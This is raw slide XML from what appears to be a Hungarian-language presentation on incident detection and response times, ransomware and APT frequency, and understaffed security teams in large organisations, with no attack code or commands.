            <a:endParaRPr lang="hu-HU" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:cs typeface="Intel Clear"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="object 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1287237" y="5185675"/>
            <a:ext cx="4514961" cy="358368"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="108014" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="165100">
              <a:spcBef>
                <a:spcPts val="851"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="1020763" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Intel Clear"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Intel Clear"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Intel Clear"/>
              </a:rPr>
              <a:t>nap</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Intel Clear"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Intel Clear"/>
              </a:rPr>
              <a:t>IDŐSÁV A VÁLASZRA/REAKCIÓRA</a:t>
            </a:r>
            <a:endParaRPr sz="1800" dirty="0">
              <a:latin typeface="+mn-lt"/>
              <a:cs typeface="Intel Clear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71714" y="1900954"/>
            <a:ext cx="226266" cy="22626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152133" y="1904604"/>
            <a:ext cx="240452" cy="24045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980933" y="1879204"/>
            <a:ext cx="240452" cy="24045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802198" y="1886562"/>
            <a:ext cx="240452" cy="24045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7483449" y="1876590"/>
            <a:ext cx="240452" cy="24045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8974681" y="1877536"/>
            <a:ext cx="240452" cy="24045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0592050" y="1878803"/>
            <a:ext cx="240452" cy="24045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8" name="Snip Diagonal Corner Rectangle 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1881380" y="1433407"/>
            <a:ext cx="780059" cy="370287"/>
          </a:xfrm>
          <a:prstGeom prst="snip2DiagRect">
            <a:avLst/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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2 ÓRA</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Snip Diagonal Corner Rectangle 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3698237" y="1433407"/>
            <a:ext cx="780059" cy="370287"/>
          </a:xfrm>
          <a:prstGeom prst="snip2DiagRect">
            <a:avLst/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4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ÓRA</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Snip Diagonal Corner Rectangle 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5532394" y="1442730"/>
            <a:ext cx="780059" cy="370287"/>
          </a:xfrm>
          <a:prstGeom prst="snip2DiagRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6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1 NAP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Snip Diagonal Corner Rectangle 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7148260" y="1433407"/>
            <a:ext cx="910829" cy="370287"/>
          </a:xfrm>
          <a:prstGeom prst="snip2DiagRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1.5 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NAP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Snip Diagonal Corner Rectangle 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8704877" y="1433407"/>
            <a:ext cx="780059" cy="370287"/>
          </a:xfrm>
          <a:prstGeom prst="snip2DiagRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6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2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> NAP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Snip Diagonal Corner Rectangle 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10358166" y="1433407"/>
            <a:ext cx="780059" cy="370287"/>
          </a:xfrm>
          <a:prstGeom prst="snip2Diag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4 NAP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Rectangle 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1278230" y="3773071"/>
            <a:ext cx="3010756" cy="550691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tabLst>
                <a:tab pos="615950" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="hu-HU" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:cs typeface="Intel Clear"/>
              </a:rPr>
              <a:t>4 óra	IDŐSÁV AZ ÉSZLELÉSRE</a:t>
            </a:r>
            <a:endParaRPr lang="hu-HU" sz="1800" dirty="0">
              <a:cs typeface="Intel Clear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1296233" y="4448790"/>
            <a:ext cx="6427668" cy="550691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113">
              <a:spcBef>
                <a:spcPts val="887"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="792163" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="hu-HU" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="Intel Clear"/>
              </a:rPr>
              <a:t>1.5 nap	IDŐSÁV A JAVÍTÁSRA</a:t>
            </a:r>
            <a:endParaRPr lang="hu-HU" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:cs typeface="Intel Clear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1296232" y="5185675"/>
            <a:ext cx="9536269" cy="55069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113">
              <a:spcBef>
                <a:spcPts val="887"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="792163" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="hu-HU" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="Intel Clear"/>
              </a:rPr>
              <a:t>4 nap	IDŐSÁV A VÁLASZRA / REAKCIÓRA</a:t>
            </a:r>
            <a:endParaRPr lang="hu-HU" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:cs typeface="Intel Clear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1278230" y="3097352"/>
            <a:ext cx="1929777" cy="550691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tabLst>
                <a:tab pos="615950" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="hu-HU" sz="1800" b="1" strike="sngStrike" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:cs typeface="Intel Clear"/>
              </a:rPr>
              <a:t>A VÉDELEM ELESIK</a:t>
            </a:r>
            <a:endParaRPr lang="hu-HU" sz="1800" strike="sngStrike" dirty="0">
              <a:cs typeface="Intel Clear"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="39" name="Straight Connector 38"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8382000" y="711200"/>
            <a:ext cx="0" cy="2692400"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx2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>
            <a:off x="942399" y="1418511"/>
            <a:ext cx="0" cy="916157"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx2"/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3616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5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5" name="Object 29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6" name="Picture 20" hidden="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itel 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="359999" y="294041"/>
            <a:ext cx="10771827" cy="588082"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1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600" kern="1200" dirty="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/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2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hu-HU" dirty="0" smtClean="0"/>
              <a:t>MIT TAPASZTALUNK MA EBBŐL A PIACON?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="hu-HU" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>JELLEMZŐEN EGY &gt;1000 FŐ KÖRÜLI SZERVEZETBEN</a:t>
            </a:r>
            <a:endParaRPr lang="hu-HU" dirty="0">
              <a:latin typeface="+mn-lt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359999" y="1860517"/>
            <a:ext cx="6189391" cy="363791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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>NAPONTA EGY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="232627"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ÚJ, EDDIG ISMERETLEN MALWARE (LEGINKÁBB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>RANSOMWARE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="232627"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="232627"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>MUTÁCIÓ, KÉRDÉS, HOGY</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="232627"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>MIBEN MÁS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="232627"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>MEDDIG JUTOTT EL</a:t>
            </a:r>
          </a:p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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>3-4 NAP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="232627"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>A FELGÖNGYÖLÍTÉS</a:t>
            </a:r>
          </a:p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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="232627"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>VÉDEKEZÉS: 1 HÉTTŐL – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>A VÉGTELENSÉGIG</a:t>
            </a:r>
          </a:p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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>EGY-KÉT HAVONTA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="232627"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>KOMOLYABB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>APT</a:t>
            </a:r>
            <a:endParaRPr lang="hu-HU" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="232627"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p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endParaRPr lang="hu-HU" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="232627"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt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9390" y="1860517"/>
            <a:ext cx="2470950" cy="252137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5226" y="3805034"/>
            <a:ext cx="4550227" cy="2270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461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5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5" name="Object 29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6" name="Picture 20" hidden="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itel 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="359999" y="294041"/>
            <a:ext cx="10771827" cy="588082"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1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600" kern="1200" dirty="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/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2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hu-HU" dirty="0" smtClean="0"/>
              <a:t>KONKRÉT TÁMADÁSOKBAN HOGYAN TELJESÍTENEK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="hu-HU" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>PL. EGY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>DDoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> (MONDJUK WEBBANK) ESETÉBEN</a:t>
            </a:r>
            <a:endParaRPr lang="hu-HU" dirty="0">
              <a:latin typeface="+mn-lt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5546870" y="1803837"/>
            <a:ext cx="5739081" cy="397031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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>KIDERÍTÉS: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>1-2 NAP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>WEBES OK HAMAR MEG VAN</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>TELJES FEJLESZTÉST VÉGIG NÉZNI</a:t>
            </a:r>
          </a:p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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>VÉDEKEZÉS: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>5-7 NAP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>MENEDZSMENT NYOMÁSSAL!</a:t>
            </a:r>
            <a:endParaRPr lang="hu-HU" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>HA MEGFELELŐ (PL. KÖZPONTI ELEMZŐ) ESZKÖZÖK LENNÉNEK </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>90%-AL CSÖKKENTHETŐ LENNE A RÁFORDÍTÁS</a:t>
            </a:r>
          </a:p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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ALKALMAZÁS LOG</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>-OKKAL, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>GYÁRTÓI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>REPORT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>-OKKAL MÉG MINDIG </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>GOND VAN</a:t>
            </a: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906004660"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="318445" y="1728592"/>
          <a:ext cx="5228425" cy="39206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718267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5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5" name="Object 29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6" name="Picture 20" hidden="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itel 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="359999" y="294041"/>
            <a:ext cx="10771827" cy="588082"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1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600" kern="1200" dirty="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/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2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hu-HU" dirty="0" smtClean="0"/>
              <a:t>SZERVEZETI FESZÜLTSÉG</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>MEDDIG BÍRJUK ERŐFORRÁSSAL?</a:t>
            </a:r>
            <a:endParaRPr lang="hu-HU" dirty="0">
              <a:latin typeface="+mn-lt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59999" y="1860517"/>
            <a:ext cx="6189391" cy="3545586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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>1-3 EMBER </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>VAN A BIZTONSÁGRA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>95%-BAN SZABÁLYOZNAK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>, ÍRNAK, BETARTATNAK, ÚJ RENDSZEREKET VIZSGÁLNAK, ÜZEMELTETNEK</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>5%-BAN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>FOGLALKOZNAK </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>INCIDENSEK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>KEL</a:t>
            </a:r>
          </a:p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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>NAGYOBB SZERVEZETNÉL (...MINT A FEHÉR HOLLÓ)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>3-4 RISK </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>MGMT.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>5 SOC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>JELLEGŰ, INCIDENS FELADATOK</a:t>
            </a:r>
            <a:endParaRPr lang="hu-HU" sz="2400" dirty="0" smtClea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950075" y="4972833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 err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Forrás</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>: Flickr, Awarded </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Honorable Mention Sumo Fun by DOD EMP ERIC ARMSTRONG - Division 2 Other Eligible Patron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9390" y="1860517"/>
            <a:ext cx="4643083" cy="3112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263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5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5" name="Object 29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6" name="Picture 20" hidden="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itel 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="359999" y="294041"/>
            <a:ext cx="10771827" cy="588082"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1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600" kern="1200" dirty="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/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2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hu-HU" dirty="0" smtClean="0"/>
              <a:t>A TIK-TAK ELV... </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>MI KELL A MEGFELELŐ INCIDENSKEZELÉSHEZ?</a:t>
            </a:r>
            <a:endParaRPr lang="hu-HU" dirty="0">
              <a:latin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13567" y="1816274"/>
            <a:ext cx="1750094" cy="369485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3600" dirty="0" smtClean="0">
                <a:solidFill>
